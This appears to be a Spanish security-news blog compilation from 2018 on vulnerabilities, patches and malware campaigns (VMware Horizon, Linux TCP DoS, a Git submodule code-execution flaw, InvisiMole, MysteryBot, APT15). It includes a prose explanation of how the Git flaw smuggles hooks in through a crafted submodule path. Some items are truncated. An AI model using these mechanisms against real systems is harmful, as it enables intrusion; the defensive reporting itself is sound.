Las versiones de Horizon 6, 7 y Horizon Client para Windows presentan una vulnerabilidad de lectura fuera de los límites de memoria en la librería «Message Framework». Un usuario malicioso con pocos privilegios podría explotar esta vulnerabilidad permitiendo acceder a información desde un proceso privilegiado en un sistema donde se encuentre instalado Horizon Connection Server, Horizon Agent u Horizon Client afectados por esta vulnerabilidad.

Este problema solo afecta a las versiones de Horizon 6 y 7 de Microsoft Windows.

Today we released a new and an updated #VMware Security Advisory. Check out https://t.co/nX6pezEPrp and https://t.co/goNuO7XzVr.

— VMware Sec Response (@VMwareSRC) 7 de agosto de 2018

VMware ha publicado las siguientes actualizaciones:

Horizon 7 – Windows | Parche 7.5.1:
https://my.vmware.com/en/web/vmware/info/slug/desktop_end_user_computing/vmware_horizon/7_5

Horizon 6 – Windows | Parche 6.2.7:
https://my.vmware.com/group/vmware/info?slug=desktop_end_user_computing/vmware_horizon/6_2

Horizon Client for Windows – Windows | Parche 4.8.1:
https://my.vmware.com/web/vmware/details?productId=578&downloadGroup=CART19FQ2_WIN_4_8_1

Más información:

 

VMSA-2018-0019
https://www.vmware.com/security/advisories/VMSA-2018-0019.htmlCVE-2018-6970
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6970

Bughunting, la economía alrededor de los errores

Encontrar un fallo de seguridad en una aplicación o servicio conocido puede llegar a ser lucrativo…o meterte en graves problemas legales. Vamos a dar un repaso al arte de reportar vulnerabilidades.

Sabes que está ahí, lo puedes sentir, es ese olor ocre y salino de la sustancia que emana de la presa herida. El cazador lo percibe, agudiza sus sentidos y acecha en silencio; esperando pacientemente al momento adecuado. Un segundo más, abres el editor de texto (Vim, naturalmente) y cambias dos lineas de tu script. Zas!: ejecución remota de código arbitrario conseguida. Premio. ¿Ahora qué hacemos con el trofeo?

Hace poco, leía en una viñeta de esas que aparecen, brillan y se extinguen en un par de milésimas de red social, que los Ingenieros Mecánicos y Aeronáuticos confían plenamente en aquello que diseñan y construyen. Es decir, es seguro y transmiten esa seguridad. Soluciones contrastadas, experimentadas. No dejan espacio al error, lo arrinconan, le temen, lo respetan, pero lo desafían y controlan hasta reducirlo a probabilidades muy reducidas. Ahora pregunta lo mismo a un Ingeniero Informático…

En el software las probabilidades son las mismas, pero en sentido contrario. Es decir, es ridículamente improbable que encuentres un programa que esté libre de errores. Irónicamente…no falla. Hay algo en el proceso de construcción de nuestros ingenios que impide que estén libres de errores. Esto no es nuevo, ya lo dijo el grandísimo Fred Brooks: No hay balas de plata. El software es complejo, mucho y está lejos de ser perfecto.

No hay dos errores iguales

Bien, creo que lo hemos dejado claro o al menos lo hemos intentado. El software está lleno de errores. El problema añadido es que los errores no son idénticos, poseen una jerarquía, gravedad y especializaciones propias. De entre ellos podemos destacar los errores de seguridad, que al fin y al cabo son los que nos interesan. Estos son especialmente graves de por sí, puesto que conllevan un impacto asociado a una necesidad humana: la de sentirnos seguros.

No es lo mismo un error funcional, por ejemplo: Cuando pulso esta opción de menú aparece una molesta ventana de error, pero el proceso sigue su curso, que uno de seguridad: Cuando pulso sobre esta opción de menú, aparece una molesta ventana de error, le doy al cuadro de ayuda, mostrar propiedades, abrir consola, pum, eres administrador. Evidentemente, las consecuencias no son las mismas.

Además -para mejorar la cosa- está el primo hermano del error: el contexto. Puedes tener un error, poco grave a primera vista y que, por ejemplo, solo afecta al redondeo de unos pocos decimales. ¿Nada grave, verdad? Escala eso a millones de entradas en un software científico y tendrás un error de magnitudes incalculables. La diferencia suficiente entre hallar la vacuna del ébola a encontrar un nuevo colorante industrial para la gaseosa. Uy, por cuatro péptidos de nada.

Economía de mercado

Vale, ya sabemos que el software es un saco de bichos, que estos pueden ser más o menos graves y que las consecuencias de un fallo de seguridad pueden ser desastrosas según el contexto. ¡Anda!, ¿Y qué pasaría si descubres un error por el cual un tercero le podría sacar una rentabilidad económica o mediática? Pues que acabas de encontrar un billete de lotería premiado. Descubres algo, lo trasladas a un interesado a cambio de unos doblones y este usa esa información para su propio beneficio. Eso, amigos, nos lleva a construir una auténtica economía de mercado (con su equivalente paralelo mercado negro) basada en los errores de seguridad.

Servicios de inteligencia, contrainteligencia, brokers de exploits, productores de software de control remoto, unidades militares que participan en operaciones de ciberguerra, robo de propiedad intelectual, etc. Hay intereses de todo tipo y ejemplos que vemos casi a diario de demanda de nuevos zero-days para mantener el frente abierto. Una vez sale el parche, se acabaron las nuevas operaciones…hasta que el siguiente exploit devuelva la pelota al campo.

Y aun no hemos mencionado las botnets, el cryptojacking y el ransomware. Muchas de ellas se apoyan en la mera ingeniería social e ir probando suerte con campañas de phishing para ir infectando equipos. Sin embargo, esta técnica suele tener un porcentaje sorprendentemente bajo de éxito. No obstante, cuando estas campañas van acompañadas de un exploit fresco, la rentabilidad en los primeros días se dispara exponencialmente.

Que nadie crea que vender un exploit es algo exclusivo del mercado negro. Existencompañías dispuestas a pagar una suma importante de dineros a cambio de esa secuencia única de ceros y unos.

Bug hunting, cuando la necesidad crea el producto

Hastiadas por ver como sus productos se convertían en un continuo mercadeo que afecta a sus usuarios, las empresas comenzaron a dar un paso en un peculiar sentido: No lo vendas a ellos, compártelo con nosotros. Ahora son las propias empresas, afectadas por los errores de seguridad en sus productos, las que compran los fallos de seguridad a sus descubridores.

Uno de los primeros programas de este tipo es el de Google. Allá por el 2013 anunció que pagaría por los errores de seguridad en sus productos; ahora incluso por ciertos proyectos de fuente abierta, cuyas librerías son usadas por ellos. Este paso llevó a otras compañías a anunciar el emprendimiento de programas de este tipo con pequeñas variaciones en cuanto a reglas y premios.

Tras ellos, otros con buen olfato vieron claro que aquí había negocio. ¿Por qué no abrir el negocio del reporte de fallos de seguridad? Estaba claro que había una necesidad y, por otro lado, un batallón de personas interesadas en investigar y descubrir fallos. Así que si hay una demanda y por otro una oferta…unámoslos con el pegamento universal que todo el mundo entiende y usa: el dinero.

Este tipo de esquema asume que la gente va a seguir investigando, sean cuales sean sus motivaciones y que los servicios y productos desarrollados por empresas son demasiado grandes como para ser controlados por un departamento. Win-win. Todos ganan, todos contentos.

En algunos casos, el investigador ni tan siquiera es premiado económicamente. Existen programas de recompensas que solo premian con una mención o con merchandising, dependiendo de la gravedad del hallazgo. Esperad, esperad, no os riáis. Una mención puede parecer ridícula, pero en el curriculum de un investigador puede ser la diferencia con el resto de candidatos. Por otro lado, las vulnerabilidades especialmente graves pueden llegar a reportar beneficios de cientos de miles de dólares. Como vemos el abanico de premios es surtido.

¿Cómo reportar una vulnerabilidad que no posee un programa de recompensas?

Es complicado. Muchas empresas no se toman bien este tipo de acciones. Quizás porque derivan a departamentos legales donde no saben maniobrar de otra forma que no sea abriendo fuego contra el supuesto enemigo o porque se toman como una ofensa el que alguien haya estado husmeando en sus servidores. Sea como fuere, si una empresa no indica explícitamente la manera de reportar fallos de seguridad, no se los reportes directamente.

Desde luego no reportar no implica que no des conocimiento. Existen muchísimas posibilidades de hacerlo sin meterte en un lío legal. Por un lado has descubierto algo, sabes que es ético que dicho fallo se conozca y sea reparado, pero por otro tienes miedo de que tu buena intención acabe trayéndote quebraderos de cabeza y arrastres tu alma y tus ahorros por los juzgados del país durante unos cuantos años.

En España puedes probar con el CERTSI, donde te ofrecen anonimato y si en un plazo de tiempo prudencial no se ha encontrado solución por parte del fabricante, se publicarían los detalles de tu hallazgo con tu nombre si lo deseas.

Francamente, si te gusta encontrar fallos y ganarte un dinero y renombre, las opciones anteriores, del tipo Bugcrowd o Hackerone poseen un buen equilibrio. Busca un programa de recompensas que te interese, léete las condiciones y a cazar!

Denegación de servicio remota en los núcleos Linux y FreeBSD

Un investigador de los Nokia Bell Labs ha descubierto vulnerabilidades en los núcleos Linux y FreeBSD que pueden usarse para saturar el procesador (y consecuentemente la máquina) a través de un flujo TCP especial

No estamos ante vulnerabilidades que podrían ser aprovechadas en teoría, en circunstancias especiales, si se alinean los planetas… Que pasa a veces con vulnerabilidades de este tipo en el núcleo Linux. Y eso lo sabemos porque Akamai ha realizado un comunicado oficial asegurando que ha parcheado sus sistemas más críticos y está trabajando en parchear el resto en estos momentos. Ambas vulnerabilidades, tanto la de Linux como la de FreeBSD han venido de la mano de Juha-Matti Tilli, un investigador de los Nokia Bell Labs. Estos laboratorios pertenecen a la división de investigación industrial de la famosa «teleco» multinacional Nokia.Para comprender estas dos vulnerabilidades, es necesario recordar por encima lo básico de redes. Para que la información llegue de un punto a otro del planeta, esta información suele envolverse en varias capas. Literalmente, a cada trozo de información se le pone un prefijo (y a veces un sufijo) que contiene información relativa a esa capa. Y el proceso se repite por cada capa. Cada una de estas capas es responsable de algún aspecto de la comunicación: una contiene información sobre el siguiente nodo al que viajará el paquete, otra contiene información que permite asegurar que no se pierde ningún paquete… Durante el viaje, las capas se van quitando, poniendo y modificando según sea necesario. De hecho, cada dispositivo de red (router, switch, tarjeta de red y el mismo sistema operativo) está preparado para interpretar ciertas capas e ignorar las otras.

En este caso, la vulnerabilidad se encuentra en la forma en la que ambos núcleos manejan el protocolo TCP, hermano del protocolo UDP que aparece en la figura. TCPtiene entre sus responsabilidades dividir en trozos llamados «segmentos» la información que pretende transportar si es demasiado grande para transportarse de una sola vez. Tras dividirse en segmentos, TCP se encarga de que cada segmento tenga un identificador que permita al destinatario juntar los segmentos TCP en el orden correcto y reconstruir la información original. Esto es necesario, ya que los paquetes no tienen por qué llegar en el orden en el que salieron.

Llegados a este punto, ya podemos empezar a entender las vulnerabilidades tal y como la explican los reportes oficiales (el primero Linux y el segundo FreeBSD):

One of the data structures that holds TCP segments uses an inefficient algorithm to reassemble the data. This causes the CPU time spent on segment processing to grow linearly with the number of segments in the reassembly queue.

Juha-Matti Tilli reported that malicious peers could inject tiny packets in out_of_order_queue, forcing very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet.

Ambas vulnerabilidades dan a entender el mismo problema subyacente: la reconstrucción de la información original a partir de los segmentos TCP fuera de orden no es demasiado eficiente. Los algoritmos usados para la reconstrucción seguramente funcionan bastante bien en las circunstancias habituales, pues en otro caso se habrían detectado problemas de rendimiento previamente. Pero en casos raros, y especialmente si quieres buscarle las cosquillas, es posible a través de una serie de segmentos TCP especialmente diseñados causar que la reconstrucción tarde demasiado. Lo de «demasiado» significa que para una cantidad relativamente pequeña de segmentos TCP (es decir, con un ancho de banda pequeño) conseguimos usar tiempo del procesador de una forma desproporcionada.

Tanto el código del núcleo de Linux como el de FreeBSD han sido actualizados con sendos parches. En Linux estamos hablando de la versión 4.9 para adelante como las más afectadas, pero con la 4.8 y anteriores vulnerables en menor medida (necesitando más tráfico para causar el mismo efecto). En FreeBSD se ven afectadas todas las versiones. La vulnerabilidad de Linux ha recibido el identificador CVE-2018-5390, mientras que la de FreeBSD ha recibido el CVE-2018-6922.

 

Más información:

Merge branch ‘tcp-robust-ooo’

https://github.com/torvalds/linux/commit/1a4f14bab1868b443f0dd3c55b689a478f82e72e

Resource exhaustion in TCP reassembly

https://www.freebsd.org/security/advisories/FreeBSD-SA-18:08.tcp.asc

Cuando tu impresora es más lista de lo que parece: Ejecución remota en HP

HP ha publicado un boletín informando de una vulnerabilidad que permite ejecución remota de código en múltiples modelos de impresoras de tinta

La puntuación base CVSS no deja lugar a dudas: un 9.8 sobre 10. Para que nos entendamos, esta vulnerabilidad equivale a dejarse la puerta de casa abierta con las joyas en la mesa del salón. A pesar de que los vectores CVSS muchas veces no permiten describir la complejidad de una vulnerabilidad, un valor extremo es un mensaje claro. Y afectando a múltiples dispositivos, es una pequeña catástrofe. De éstas que te hacen poner un aviso claro en tu web:

En este caso, es posible que el reporte por parte del investigador externo se haya realizado de forma privada, ya que no aparece vínculo alguno al reporte técnico original. Estos reportes suelen ser más técnicos, y te permiten entender la parte importante de la vulnerabilidad, ya que los reportes oficiales suelen ser bastante escuetos y parecen escritos por cumplir. Por tanto, en este caso no podemos ofrecer un análisis técnico de los hechos y nos limitaremos a comentar el boletín oficial y comentar algunos hechos relacionados. La vulnerabilidad es lo más clásico: se manda a imprimir un archivo especialmente diseñado que desborda memoria en la impresora y permite ejecutar código arbitrario.

En el boletín oficial asignan los identificadores CVE-2018-5924 y CVE-2018-5924 a las vulnerabilidades descritas, y especifican una lista bastante larga de productos afectados, viéndose afectadas las impresoras de inyección de tinta (inkjet). También se especifica que se han actualizado los firmwares de las impresoras afectadas, y que los usuarios de éstas deberían actualizar el firmware a la versión indicada siguiendo el procedimiento enlazado en el mismo boletín.

Lo cierto es que es un tema algo candente, y parece ser que con la fiebre de la seguridad del IoT algunos se han dado cuenta de que esos cacharros que imprimen son otro punto vulnerable más. Y lo bueno de una impresora es que no se suele considerar sospechosa, pues se le cree tonta. Y al final es un dispositivo más, probablemente con acceso a Internet y un procesador ARM genérico que ejecutará lo que sea. Tirando un poco de historial y sin irnos muy lejos, podemos comprobar que hace casi un año se descubrieron algunas vulnerabilidades graves en impresoras HP. El reporte técnico que se realizó es para sentarse a leerlo y disfrutarlo.

Respecto a la seguridad de las impresoras, hay una wiki bastante interesante sobre la «(in)seguridad» como dicen ellos mismos de estos dispositivos. Asociado a la wiki disponemos de PRET, un conjunto de herramientas para la explotación de impresoras. Visto el panorama, parece un buen momento para prestarle atención a la explotación de estos dispositivos.

Más información:

 

Una-al-día:

http://unaaldia.hispasec.com

Detectadas aplicaciones en Google Play Store que contienen malware… para Windows

Las aplicaciones se encontraban en el repositorio oficial desde octubre del año pasado. Aunque inofensivas para los usuarios de Android, si se ejecutan en un entorno Windows pueden infectar el equipo con un keylogger.

Imagen obtenida de Palo Alto.

La retirada de aplicaciones de Google Play Store debido a su contenido malicioso no es nada nuevo. De hecho, hace poco una buena tanda de aplicaciones de minería fueron eliminadas del repositorio. Sin embargo, lo curioso de este caso es que, aunque maliciosas, las aplicaciones no presentan riesgos para usuarios de Android. 

Han sido investigadores de Palo Alto los que han detectado un total de hasta 142 aplicaciones disponibles en Google Play Store que contienen al menos un ejecutable malicioso para Microsoft Windows. El fichero es inofensivo para los usuarios móviles, sin embargo su desempaquetado y posterior ejecución en entornos Windows lleva a la infección del equipo con un keylogger.

La teoría más plausible es que sean los propios desarrolladores de las aplicaciones los infectados por malware (posiblemente de varias familias) y durante el proceso de desarrollo los ejecutables se han introducido dentro del APK que ha pasado a distribuirse. Cabe señalar que otras aplicaciones del mismo desarrollador están limpias, lo que apunta a que han sido confeccionadas en otro entorno.

Las APKs involucradas que Palo Alto ha hecho públicas se pueden encontrar en Koodous. Como curiosidad, el ejecutable de Windows fue visto por primera vez en 2013.

Actualización para Adobe Flash soluciona un 0-day

Adobe ha publicado un boletín de seguridad para Adobe Flash Player, que en esta ocasión soluciona un ‘0-day’ y otras 3 vulnerabilidades que afectan al popular reproductor

Adobe ha publicado un boletín de seguridad (APSB18-19) que corrige cuatro vulnerabilidades en su reproductor Flash Player para Windows, macOS, Linux y Chrome OS. Dos de estas vulnerabilidades son de carácter crítico (una de ellas un ‘0-day’) y las dos restantes están clasificadas como importantes.

Según sus identificadores CVE, los errores de seguridad son los siguientes:

* CVE-2018-4945: un error de confusión de tipos que podría permitir la ejecución de código arbitrario en el contexto del usuario. Este fallo de seguridad ha sido descubierto por Jihui Lu de Tencent KeenLab y willJ de Tencent PC Manager trabajando junto a Trend Micro’s Zero Day Initiative.

* CVE-2018-5000: un desbordamiento de enteros que permitiría la revelación de información. Ha sido reportada anónimamente a través de Trend Micro’s Zero Day Initiative.

* CVE-2018-5001: una lectura fuera de límites que también permitiría revelar información. Ha sido reportada anónimamente vía Trend Micro’s Zero Day Initiative.

* CVE-2018-5002: un desbordamiento de memoria que permitiría ejecutar código arbitrario. Esta vulnerabilidad ha sido descubierta de manera independiente por Chenming Xu y Jason Jones de ICEBRG, Bai Haowen, Zeng Haitao y Huang Chaowen de 360 Threat Intelligence Center (360 Enterprise Security Group), y Yang Kang, Hu Jiang, Zhang Qing, y Jin Quan de Qihoo 360 Core Security.

Existe un exploit ‘0-day’ para esta última vulnerabilidad (CVE-2018-5002) que está siendo explotada,y se tiene constancia de su utilización en ataques dirigidos contra usuarios de Windows en Oriente Medio. Estos ataques aprovechan documentos de Office con contenido incrustado malicioso de Flash Player distribuido por correo electrónico, con nombres como ‘***salary.xlsx’ para llamar la atención del usuario.

Las vulnerabilidades afectan a las versiones de Adobe Flash Player 29.0.0.171 (y anteriores) para Windows, macOS, Linux, y los navegadores Google Chrome, Internet Explorer y Edge.

Adobe ha publicado la versión 30.0.0.113 de Adobe Flash Player destinada a solucionar las vulnerabilidades anteriormente expuestas, y se encuentran disponibles para su descarga desde la página oficial.

Adobe recomienda a los usuarios de Adobe Flash Player Desktop Runtime para Windows, macOS y Linux actualizar a través del sistema de actualización del propio producto o desde ‘Adobe Flash Player Download Center’.

Más información:

Security updates available for Flash Player | APSB18-19:

https://helpx.adobe.com/security/products/flash-player/apsb18-19.html

Adobe Flash Player Download Center:

https://get.adobe.com/flashplayer/

CVE-2018-5002 – Analysis of the Second Wave of Flash Zero-day Exploit in 2018:

http://blogs.360.cn/blog/cve-2018-5002-en/

Vulnerabilidad en Git permite la ejecución de código arbitrario a través de submodulos

Entre los dos fallos corregidos en la última iteración del popular sistema de control de versiones, uno permite la ejecución de código arbitrario a través del clonado recusivo de un repositorio.

El pasado día 29 el equipo de desarrollo de Git lanzaba una nueva versión que corrige dos vulnerabilidades. La primera, con identificador CVE-2018-11233, trata un fallo en las pruebas de validez de rutas en sistemas NTFS que permite leer zonas de memoria aleatorias.

La segunda (CVE-2018-11235) es la que llama especialmente la atención. A través de un fichero .gitmodules especialmente manipulado es posible ejecutar código arbitrario en la maquina que esté clonando un repositorio junto a sus submódulos.

En Git, el proceso de descarga inicial de un repositorio se denomina clonado. Durante este proceso, cierta información no se incluye en la copia local del repositorio. Un ejemplo son los hooks (scripts que se ejecutan al realizarse acciones concretas). Estos son definidos en la versión local de cada usuario, evitando por ejemplo que un repositorio recién clonado ejecute comandos en el equipo del usuario.

Por otro lado, tenemos los submdulos. Estos son utilizados para incluir repositorios de otros proyectos dentro de otro que los requiere. Cuando se clona un repositorio, se pueden clonar sus submódulos automáticamente usando el comando ‘git clone –recurse-submodules‘.

El comportamiento normal de este comando es clonar tanto el repositorio padre como su submódulo, dejando hooks y otras configuraciones fuera de la versión local de ambos. Pero en esta vulnerabilidad se presenta una forma de evitarlo. Primero, se define un submódulo dentro de un repositorio padre, pero además se incluye el código y la configuración del submódulo. De esta forma nos saltamos el proceso de clonado del submódulo (el código ya existe en nuestra versión local) y permitimos a los hooks viajar dentro del repositorio descargado.

Una vez con la definición de los hooks en la máquina del usuario, solo necesitamos que se apunten a ellos para ejecutarlos. Desgraciadamente, existe un error en la validación del parámetro ‘name‘ en la configuración de Git que permite definir dónde residen los hooks que son ejecutados. Se podría definir, por ejemplo, que se ejecutaran los hooks que residen en ‘../submodulo/.git/‘. De esta forma, un atacante remoto podría crear un repositorio especialmente manipulado y ejecutar código arbitrario en nuestro sistema a través de un repositorio Git malicioso.

La vulnerabilidad, que ha sido descubierta por Etienne Stalmans, ya ha sido solucionada en las versiones v2.17.1, v2.13.7, v2.14.4, v2.15.2 y v2.16.4 de Git. Sin embargo, dada la gran cantidad de sistemas que usan Git como base, aun queda trabajo por delante. Por ejemplo, en Kubernetes esta vulnerabilidad permitiría obtener permisos de superusuario en un nodo usando volumenes GitRepo.

Git v2.17.1 Release Notes:

https://marc.info/?l=git&m=152761328506724&w=2

Actualización de múltiples productos Apple

Apple ha publicado 7 boletines de seguridad que solucionan vulnerabilidades en los productos iOS, macOS, watchOS, tvOS, Safari, iTunes e iCloud para Windows. Entre todos los productos se corrigen 192 fallos de seguridad

Los boletines publicados con las actualizaciones y problemas solucionados se resumen como sigue:El boletín para iOS 11.4, el sistema operativo para dispositivos móviles de Apple (iPad, iPhone, iPod, etc.), resuelve 35 vulnerabilidades. Este es el boletín más amplio de todos y los problemas corregidos están relacionados con múltiples componentes, entre los que se incluyen ‘Bluetooth‘, ‘Contacts‘, ‘FontParser‘, ‘iBooks‘, el kernel y ‘WebKit‘ entre otros. Los fallos más graves permitirían ejecutar código arbitrario con privilegios de sistemaaprovechando diversos problemas en la gestión de la memoria del kernel (CVE-2018-4241, CVE-2018-4243 y CVE-2018-4249).

macOS High Sierra 10.13.5 y los Security Update 2018-003 para Sierra y El Capitan. En este caso se solucionan 32 vulnerabilidades que afectan a múltiples componentes, que entre otros incluyen a ‘AMD‘, ‘ATS‘, ‘apache_mod_php‘, ‘Bluetooth‘, ‘Hypervisor‘, ‘Firmware‘ y el kernel entre otros. 10 de estas vulnerabilidades podrían permitir la ejecución de código arbitrario 9 de ellas con privilegios de sistema (CVE-2018-4196, CVE-2018-4242, CVE-2018-4228, CVE-2018-4236, CVE-2018-4234, CVE-2018-8897, CVE-2018-4241, CVE-2018-4243, CVE-2018-4230, CVE-2018-4193). Adicionalmente otras 2 permitirían elevar los privilegios del usuario.

Safari 11.1.1 representa otro boletín que soluciona 13 vulnerabilidades debidas, en su mayoría, a problemas en ‘WebKit’, el motor de código abierto que es la base de este navegador.

El boletín para watchOS 4.3.1, el sistema operativo destinado a los relojes inteligentes Apple Watch, soluciona 20 vulnerabilidades entre las que también se encuentran algunas que podrían permitir la ejecución de código arbitrario y la elevación de privilegios.

En el sistema operativo de los televisores de la marca, tvOS 11.4, se corrigen 24 vulnerabilidades en múltiples componentes, la mayoría de ellas (10) podrían permitir la ejecución de código arbitrario y otras 2 elevar privilegios en el sistema.

Las versiones iTunes 12.7.5 e iCould 7.5 para Windows incluyen la corrección de 32 vulnerabilidades.

Todas estas versiones que corrigen los problemas de seguridad publicados en los boletines se encuentran disponibles en la página oficial de Apple, así como a través de los canales habituales de actualización.

Más información:

 

iOS 11.4:
https://support.apple.com/es-es/HT208848

Ejecución remota de código en la familia antivirus F-Secure

F-Secure ha corregido una grave vulnerabilidad en su familia de antivirus personales y empresariales, relacionada con la librería 7-Zip y el procesamiento de ficheros comprimidos RAR, que podría generar una ejecución remota de código.

El investigador en seguridad landave, ha publicado un extenso análisis de la vulnerabilidad ya corregida en 7-Zip (CVE-2018-10115) que permitiría a cualquier atacante, mediante la distribución de ficheros RAR especialmente manipulados, ejecutar código arbitrario en la máquina o dispositivo de la víctima

InvisiMole: el malware espía que convierte tu ordenador en un sistema de vigilancia

InvisiMole es un spyware utilizado en ataques dirigidos que convierte el dispositivo infectado en una cámara de video vigilancia, permitiendo al operador del malware ver y oir las actividades de la víctima.

 

Un dato curioso es que este malware lleva activo casi 5 años hasta que fue detectado por primera vez por los investigadores de ESET.

Como comentábamos antes los ataques son muy específicos y no hay un gran número de dispositivos afectados.

El malware se compone de dos módulos con múltiples funcionalidades que permiten extraer toda la información posible de las víctimas. Estos módulos se encuentran empaquetados en una DLL que le permite obtener la persistencia «secuestrando» una DLL legítima (DLL Hijacking). Estos dos módulos son cargados al inicio por alguno de los procesos ‘rundll32.exe‘, ‘explorer.exe‘ o ‘svchost.exe‘. Una vez cargados, los procesos continúan su ejecución de forma normal para evitar levantar sospechas

Más información:

 

InvisiMole: surprisingly equipped spyware, undercover since 2013
https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/InvisiMole?—?Indicators of Compromise
https://github.com/eset/malware-ioc/tree/master/invisimole

Más información:

 

Detalles técnicos del fallo:

https://securingtomorrow.mcafee.com/mcafee-labs/want-to-break-into-a-locked-windows-10-device-ask-cortana-cve-2018-8140/

MysteryBot, el nuevo troyano «todo en uno» para Android

Por si fuera poco el nivel de malware existente en los dispositivos Android en estos tiempos, ahora se le suma la propia evolución de LokiBot, que supone una nueva familia de malware denominada como MysteryBot.

El malware ha sido detectado por investigadores de ThreatFabric durante uno de sus análisis rutinarios de la familia Lokibot, de la cual hereda ciertos comportamientos. Concretamente, ha sido detectado gracias a que MysteryBot tiene el mismo servidor de control que Lokibot.

Podemos corroborar esta información utilizando la plataforma Koodous, en la cual en este momento ya existen muestras clasificadas como MysteryBot:

Las novedades que trae este malware es la combinación de varias vías de ataque que pasamos a desgranar a continuación:

Registro de pulsaciones:El malwareguarda las pulsaciones que realiza el usuario en la pantalla, aunque además tiene algunas novedades: también detecta si el teléfono está en horizontal o vertical, datos que utiliza para calcular qué se ha pulsado en el teléfono teniendo en cuenta las dimensiones del dispositivo. Tiene módulos de las familias CryEyey Anubis y, según el código analizado por ThreatFabric, parece estar aún en desarrollo.

Ransomware: Este comportamiento resulta ya familiar en el malware móvil, y trata en cifrar el dispositivo para posteriormente pedir un rescate monetario a cambio de su descifrado. En este caso la muestra no cifra datos, sino que los comprime en un archivo zipcon contraseña, la cual actualmente no tiene mucha robustez (solo 8 caracteres).

Ataques de superposición:La característica más novedosa de este malware, no tanto por lo que hace si no por su ejecución. Este comportamiento permitía qué, cuando un usuario abre una aplicación legítima, el malware aprovechará para mostrar una interfaz superpuesta, engañando al usuario de forma poco sospechosa. Sin embargo, tras la introducción de Android 7 y 8 ya no era posible realizar ataques de superposición, lo que ha llevado a los creadores de malware a buscar nuevas técnicas. Esta familia abusa del permiso ‘PACKAGE_USAGE_STATS’, que junto con el uso de la clase ‘AccessibilityService‘ y un cálculo correcto de tiempos le permite realizar ataques de superposición con éxito.

Sin duda el malware es novedoso y aprovecha las últimas técnicas de ataque en Android. Actualmente se desconoce si los atacantes tienen alguna campaña de promoción, pero lo que sí podemos observar en la captura facilitada anteriormente es que la intención es hacerse pasar por la aplicación Adobe Flash Player.

Más información:

MysteryBot; a new Android banking Trojan ready for Android 7 and 8:

https://www.threatfabric.com/blogs/mysterybot__a_new_android_banking_trojan_ready_for_android_7_and_8.html

MysteryBot en Koodous:
https://koodous.com/apks?search=tag:MysteryBot

Detectados contenedores maliciosos distribuidos a través de Docker Hub para cryptojacking

544.74 Monero, lo que al cambio son unos 67.863€ a la hora de escribir este artículo. Es la cantidad que el atacante detrás de la cuenta de Docker Hub «docker123321» ha sido capaz de minar a lo largo de un año a través de imágenes maliciosas distribuidas a sistemas expuestos y, lo que es peor, usando la propia plataforma de Docker.

Durante el último año, investigadores de varias empresas (Kromtech, Fortinet y Sysdig) han estado siguiendo de cerca este caso, hasta que finalmente el pasado 10 de mayo Docker Hub cerró la cuenta maliciosa. Detrás deja un total de 17 imágenes Docker maliciosas que habían sido descargadas en más de 5 millones de ocasiones.

Más información:

Cryptojacking invades cloud. How modern containerization trend is exploited by attackers:

https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers

MirageFox, otra APT de procedencia china

La reutilización de código entre distintas familias  de malware, ha permitido identificar un nueva variante compuesta por código de Mirage y Reaver, APT’s viejas conocidas y asociadas a la organización APT15, presuntamente vinculada al gobierno chino.

Configuración de MirageFox, que hace referencia a Mirage. Extraída de intezer.com.

Reutilizar código es lo más natural del mundo. De hecho, es lo que debes hacer si quieres escribir buen código, ya que escribir código reutilizable no tiene como única ventaja que sea reutilizable. Al tener la reutilización como meta final, debes esforzarte en que el código sea modular y legible, por lo que básicamente tienes que escribir código reutilizable aunque no tengas pensado utilizarlo de nuevo en otro sitio. Para empezar, porque te puedes equivocar y quizá termines reusándolo, y por supuesto por las ventajas adicionales ya comentadas que acarrean esta buena práctica.

No es de extrañar que sea una práctica extendida entre los programadores de malware. Al fin y al cabo, la creciente complejidad del malwareha hecho que el esfuerzo estimado para producir un único malwarese incremente, aproximadamente, en un orden de magnitud cada década. Por tanto, la creación de código reutilizable es imperativa a estas alturas. El término malwareno significa otra cosa que «softwaremalicioso», que únicamente hace referencia a la intención del software. No nos pueden sorprender por tanto cosas como que el malwarecomparte con el goodware(softwarebenigno) un nivel de calidad del código similar, o el tamaño de los equipos dedicados a la programación de éstos.

Y reutilizar código es lo que parece que ha hecho APT15, un grupo conocido por sus acciones de espionaje informático contra compañías y organizaciones de distintos países, atacando a diversos sectores como la industria del petróleo, contratistas de gobiernos, los militares… Una empresa israelí llamada Intezer, que basa su modelo de negocio en la identificación de reutilización de código en malware, ha sido la queha reconocido esta evolución de Mirageque ha bautizado como MirageFox.

En resumen, las características técnicas de esta nueva versión no son algo a destacar. Es una herramienta de administración remota (RAT) que recopila información del equipo infectado y espera órdenes de un servidor central (C&C). Lo que llama la atención de esta versión es que las muestras encontradas hacen referencia a un servidor central en la misma red localdel equipo infectado. Basándose en el modus operandide APT15en un ataque anterior, los investigadores de Intezerhan concluido que probablemente esta muestra fue configurada especialmente para ejecutarse en una red ya comprometida, concretamente una VPN(red virtual privada) cuya clave privada fue robada previamente por APT15.

Probablemente lo más interesante de esta noticia es que pone el foco de atención sobre métodos alternativos de detección de malware, por contraposición a las clásicas firmas que identifican muestras de familias concretas. Detectar nuevas muestras que han reutilizado código de malwareanterior precisamente por detectar la reutilización de código parece una aproximación bastante buena, debido a la tendencia a reutilizar código por parte de los programadores de malware.

Más información:

 

MirageFox: APT15 Resurfaces With New Tools Based On Old Ones
https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

A Look into 30 Years of Malware Development from a Software Metrics Perspective
https://cosec.inf.uc3m.es/~juan-tapiador/papers/2016raid.pdf

Github advierte sobre instaladores maliciosos encontrados en proyectos basados en blockchain

El pasado 13 de junio Github lanzó un comunicado advirtiendo a los usuarios de criptodivisas sobre instaladores Windows maliciosos encontrados en algunos repositorios de la conocida plataforma de desarrollo.

Estos ataques están dirigidos a proyectos basados en Blockchain, que por lo general involucran alguna criptodivisa que puede ser canjeada por dinero real. Los ataques tratan de suplantar algún componente del proyectopara infectar a sus usuarios y poder robar sus activos digitales.

La investigación tuvo lugar a raíz de que los desarrolladores del proyecto Syscoindescubrieran una copia no firmada del instalador «Windows Syscoin 3.0.4.1»en la página de releases del proyecto.

